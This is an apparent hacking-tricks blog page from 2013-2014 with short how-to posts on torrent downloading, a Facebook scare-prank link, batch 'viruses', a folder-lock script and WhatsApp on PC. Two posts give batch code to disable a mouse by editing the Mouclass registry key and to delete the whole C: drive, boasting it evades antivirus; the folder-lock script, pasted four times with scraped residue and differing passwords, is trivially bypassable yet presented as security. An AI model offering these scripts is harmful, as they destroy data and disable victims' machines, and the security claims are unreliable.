Saturday, 12 April 2014

DOWNLOAD TORRENT BY IDM(INTERNET DOWNLOAD MANAGER)

DOWNLOAD TORRENTS AT HIGH SPEED!!


Torrent websites are the currently largest file hosting and sharing place. Every thing weather it is free or have some cost is available freely via torrents and of course which is free off cost.


Torrents generally need some software to download these files. But there is a process by which it can be easily downloaded by Internet download Manager which will increase the downloading speed by 400 times. Just follow these steps: 

  • Go to any torrent website and search for the file/music/video etc you want.


  • Just copy the torrent magnetic link of that file
  • Now open ZBIGZ.COM in new tab.


  • Paste the magnetic torrent link in the space provided.
  • Wait till it is uploaded once uploaded click on download


Your file will be captured by internet download manager.For any query comment below..


Thursday, 13 February 2014

Ghost Profile In Facebook

Dare yourself And your friends!!!



This is one of the greatest pranks on Facebook. If you really can dare then you must try this and also you can play this prank with your friends on Facebook or any one outside the Facebook.


The link given below will take you to the ghost profile. This is really very Scary for the first time because with horror animation it also have some really very scary sound effect.



NOTE- View Ghost Profile On your Risk. (NOT FOR WEAK HEARTED PEOPLE)

Steps



  • Copy the link provided at the below and paste it to your address bar.
  • Hover Your Mouse Near the 'Add As a Friend' or near the photos and see the magic.
  • You can also copy that link and send it to your Friends to play prank with them

                               

            http://goo.gl/8ziJtp



                    or


      CLICK HERE  




                           
                                        

Saturday, 12 October 2013

Create Virus To disable Mouse


Mouse is One of The most Important part of your computer and not working of this may make your mind frustrated.


How to Create this Virus




  • Open Notepad and copy below codes

   
rem ---------------------------------
    rem Disable Mouse
    set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
    reg delete %key%
    reg add %key% /v Start /t REG_DWORD /d 4
    rem ---------------------------------
 


  • Save this file as  virus.bat 
  • Done you just created your virus.

 Double Clicking on virus.bat file will disable your mouse.

You may Be interested in:
        Creating A dangerous Virus 
                    or
        Locking Folder With Password

How to make a Dangerous Virus

Your are a minute before to create the dangerous virus you must have ever seen!!!


This Virus is bieng created by using batch file programming. 

This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. 



How to Make the virus ?

  • Open Notepad and copy below code into it.

   
@Echo off
    Del C:\ *.* |y


  • Save this file as virus.bat (Name can be anything but .bat is must)
  • Now, running this file will delete all the content of C Drive.


Warning: Try at your own risk



Yoy may be intrested in

                    Create Virus To Disable Mouse
                                          
                            

Password Protect Any Folder

Again Some time you have some sensible and much important files to protect and to keep safely it on your PC.

Here is the intresting trick how to lock the folder with a password without any software.



Steps to Create Folder Lock


  • Open Notepad and Copy code given below into it.



    cls
    @ECHO OFF
    title avkfreedom.blogspot.com
    if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
    if NOT EXIST MyFolder goto MDMyFolder
    :CONFIRM
    echo Are you sure to lock this folder? (Y/N)
    set/p "cho=>"
    if %cho%==Y goto LOCK
    if %cho%==y goto LOCK
    if %cho%==n goto END
    if %cho%==N goto END
    echo Invalid choice.
    goto CONFIRM
    :LOCK
    ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    echo Folder locked
    goto End
    :UNLOCK
    echo Enter password to Unlock Your Secure Folder
    set/p "pass=>"
    if NOT %pass%== avkfreedom goto FAIL
    attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
    echo Folder Unlocked successfully
    goto End
    :FAIL
    echo Invalid password
    goto end
    :MDMyFolder
    md MyFolder
    echo MyFolder created successfully
    goto End
    :End

cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End - See more at: http://www.coolhackingtrick.com/2013/04/password-protect-any-folder-without-any.html#sthash.nvTzvfGX.dpuf
cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End - See more at: http://www.coolhackingtrick.com/2013/04/password-protect-any-folder-without-any.html#sthash.nvTzvfGX.dpuf
cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End - See more at: http://www.coolhackingtrick.com/2013/04/password-protect-any-folder-without-any.html#sthash.nvTzvfGX.dpuf

  • Save the notepad file as lock.bat (.bat is must)
  • Now double click on lock.bat and a new folder will be created with name MyFolder
  • Copy all your data you want to protect in that New folder
  • Now double click on lock.bat and when command promp appears Type Y and press enter.
  • Now MyFolder will be hidden from you view, to access that folder double click on lock.bat 
  • It will ask for password enter your password and done. (Default password is avkfreedom


NOTE-Here the Default Password Is"avkfreedom"

 For Further Security- Copy Your LOCK.BAT file in some secure place or in pendrive.

Feel free to comment below..

 

Monday, 7 October 2013

Create Non-Deletable And Non-Renameable Folder

Some time you have some sensible and much important files to protect and to keep safely it on your PC.

Here is a trick to create a folder which neither can be deleted nor can be renamed.


Trick is that you have to make the folder with name which are reserved words in windows. You have to use only these names to create the folder. These names are-    


[ con, aux, lpt1, lpt2, lpt3 to lpt9 ]



Steps To Create Non-deleteable And Non-renameable Folder




  • Go to start and click on RUN.
  • Type "cmd" and hit ENTER.
  • In the cmd window type C: or D: and hit enter.(You can't create this type folder in the drive where windows is installed generally C:)
  • Type md con\ and hit enter (md - make directory)
  • You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.
  • Open that directory, you will see the folder created of name con.
  • Try to delete that folder or rename that folder windows will show the error message. 


How to delete such files

It is not possible to delete that folder manually but you can delete this folder by another way mentioned below.


  • Open Command Prompt
  • Type D: ( if u created this type of folder in D: drive) & hit enter
  • Type rd con\ (rd - remove directory)
  • Open that directory and the folder will not appear because it is removed.

Friday, 27 September 2013

Whats App on PC

!!!!AMAZED!!!!!

 

But its true you can have Whats App on you computer and laptop.

With Bluestack all android apps runs on windows or Linux operating system in the same way as they run on your phone.

Follow the following steps:  

  • BLUESTACK provide interference between all android apps and your computer.

    CLICK TO DOWNLOAD BLUESTACK

 

  • Choose the correct operating system download and install bluestack on your computer.

  •  Now install whats app directly via bluestack search manager or install by APK while of whats apk.

  CLICK HERE IF YOU DO NOT KNOW HOW TO MAKE APK OF WHATS APP 

 

  • After installing the whats app open it on bluestack and enjoy chatting with your friends.

    Feel free to comment below!

 

Airport Authority of India AAI JE Previous Year paper

I have tried to collect previous year paper of Airport Authority of India. AAI JE ATC PREVIOUS YEAR PAPER                            ...